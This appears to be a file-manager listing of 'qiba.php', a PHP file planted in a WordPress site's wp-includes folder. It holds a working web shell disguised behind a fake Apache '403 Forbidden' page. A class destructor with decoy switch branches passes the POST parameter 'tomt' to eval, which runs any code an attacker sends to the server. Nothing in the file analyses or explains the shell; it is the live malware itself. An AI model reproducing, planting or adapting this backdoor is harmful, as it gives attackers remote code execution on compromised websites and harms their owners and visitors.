File "qiba.php"
Full Path: /home/ikemsezv/public_html/wp-includes/IXR/qiba.php
File size: 1.72 KB
MIME-type: text/plain
Charset: utf-8
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Port 80</address>
</body></html>
<html>
<pre>
<?php
error_reporting(0);
class Navigator
{
var $m_webInfo;
var $m_check = array('Message','RequestId','Error','RecommendDoc','Object','parse');
var $m_const;
function __construct($S_uid)
{
$this->name = 'session';
$this->m_const = "$_POST";
$this->m_webInfo = $S_uid;
}
function __destruct()
{
if($this->name === 'session')
{
if($this->m_check[5] === 'parse')
{
$Session_Check = 'Error';
switch($Session_Check)
{
case 'sbrother':
echo 'error3';
break;
case 'parse':
print 'parse OK';
break;
case 'Error':
$this->Architecture();
break;
default:
print 'Default';
break;
}
}
else
{
echo "error";
}
}
else
{
echo "error";
}
echo "</pre>";
}
function Architecture()
{
switch($this->m_check[0])
{
case 'Message':
eval($this->m_webInfo);
break;
case 'RequestId':
echo 'PHP is the best language in the world!'.PHP_EOL;
break;
case 'RecommendDoc':
echo 'prefer C'.PHP_EOL;
break;
case 'Object':
echo 'Asm'.PHP_EOL;
break;
default:
echo 'The document tree is shown below'.PHP_EOL;
break;
}
}
}
$Navigator = new Navigator($_POST['tomt']);
?>
</html>